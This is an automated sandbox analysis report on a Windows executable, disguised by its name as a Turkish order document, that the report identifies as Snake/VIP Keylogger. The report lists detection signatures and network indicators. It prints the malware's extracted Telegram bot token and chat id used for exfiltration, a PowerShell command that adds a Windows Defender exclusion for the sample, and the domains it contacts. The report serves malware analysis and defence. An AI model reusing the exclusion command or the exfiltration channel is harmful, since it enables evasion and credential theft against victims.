Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe

Overview

General Information

Sample name:fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
renamed because original name is a hash value
Original sample name:fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Siparii jpeg docx .exe
Analysis ID:1586927
MD5:a4a64f5e476f06b0f9258edbe1aef13c
SHA1:5c1a197a5d7c570c1fba5167e3f7865454fdf7d5
SHA256:da0407f4df1fb7b5af96c81a21dd905852792693f10fb960930970d53ee1c3f8
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d03b:$a1: get_encryptedPassword
          • 0x2d350:$a2: get_encryptedUsername
          • 0x2ce4b:$a3: get_timePasswordChanged
          • 0x2cf54:$a4: get_passwordField
          • 0x2d051:$a5: set_encryptedPassword
          • 0x2e6f7:$a7: get_logins
          • 0x2e65a:$a10: KeyLoggerEventArgs
          • 0x2e2bf:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d23b:$a1: get_encryptedPassword
                  • 0x2d550:$a2: get_encryptedUsername
                  • 0x2d04b:$a3: get_timePasswordChanged
                  • 0x2d154:$a4: get_passwordField
                  • 0x2d251:$a5: set_encryptedPassword
                  • 0x2e8f7:$a7: get_logins
                  • 0x2e85a:$a10: KeyLoggerEventArgs
                  • 0x2e4bf:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 14 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 4692, ParentProcessName: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 3180, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 4692, ParentProcessName: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 3180, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 4692, ParentProcessName: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 3180, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:09:35.779099+010028033053Unknown Traffic192.168.2.749705104.21.64.1443TCP
                  2025-01-09T19:09:45.818402+010028033053Unknown Traffic192.168.2.749759104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:09:34.146606+010028032742Potentially Bad Traffic192.168.2.749702132.226.247.7380TCP
                  2025-01-09T19:09:35.146592+010028032742Potentially Bad Traffic192.168.2.749702132.226.247.7380TCP
                  2025-01-09T19:09:36.631009+010028032742Potentially Bad Traffic192.168.2.749706132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:09:54.886602+010018100081Potentially Bad Traffic192.168.2.749808149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:09:47.103841+010018100071Potentially Bad Traffic192.168.2.749760149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: phishing
                  Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: phishing
                  Source: http://varders.kozow.com:8081Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041"}
                  Multi AV Scanner detection for submitted file
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 68%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49704 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49760 version: TLS 1.2
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: lwhS.pdbSHA256 source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: Binary string: lwhS.pdb source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 02A1F475h11_2_02A1F2D8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 02A1F475h11_2_02A1F4C4
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 02A1F475h11_2_02A1F53D
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 02A1FC31h11_2_02A1F979
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051B2C19h11_2_051B2968
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051B31E0h11_2_051B2DC8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051B0D0Dh11_2_051B0B30
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051B1697h11_2_051B0B30
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BE0A9h11_2_051BDE00
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051B31E0h11_2_051B310E
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BD7F9h11_2_051BD550
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BDC51h11_2_051BD9A8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051B31E0h11_2_051B2DC3
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BFAB9h11_2_051BF810
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_051B0853
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_051B0040
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BCF49h11_2_051BCCA0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BD3A1h11_2_051BD0F8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BEDB1h11_2_051BEB08
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BF209h11_2_051BEF60
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BF661h11_2_051BF3B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BE501h11_2_051BE258
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_051B0673
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 051BE959h11_2_051BE6B0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05777EB5h11_2_05777B78
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577B5E6h11_2_0577B318
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05779280h11_2_05778FB0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577C826h11_2_0577C558
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577E816h11_2_0577E548
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05770FF1h11_2_05770D48
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 057718A1h11_2_057715F8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577CCB6h11_2_0577C9E8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577ECA6h11_2_0577E9D8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05771449h11_2_057711A0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05773709h11_2_05773460
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 057702E9h11_2_05770040
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 057762D9h11_2_05776030
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577BF06h11_2_0577BC38
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577DEF6h11_2_0577DC28
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 057732B1h11_2_05773008
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05770B99h11_2_057708F0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577C396h11_2_0577C0C8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577E386h11_2_0577E0B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then mov esp, ebp11_2_0577B090
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05770741h11_2_05770498
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then mov esp, ebp11_2_0577B081
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05776733h11_2_05776488
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05772A01h11_2_05772758
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 057779C9h11_2_05777720
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 057755D1h11_2_05775328
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 057725A9h11_2_05772300
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577D5D6h11_2_0577D308
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05775E81h11_2_05775BD8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05772E59h11_2_05772BB0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577BA76h11_2_0577B7A8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577DA66h11_2_0577D798
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05775A29h11_2_05775780
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577FA56h11_2_0577F788
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05777119h11_2_05776E70
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577D146h11_2_0577CE78
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05774D21h11_2_05774A78
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577F136h11_2_0577EE68
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05771CF9h11_2_05771A50
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 057748C9h11_2_05774620
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05776CC1h11_2_05776A18
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0577F5C6h11_2_0577F2F8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05775179h11_2_05774ED0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05777571h11_2_057772C8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 05772151h11_2_05771EA8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49760 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49808 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
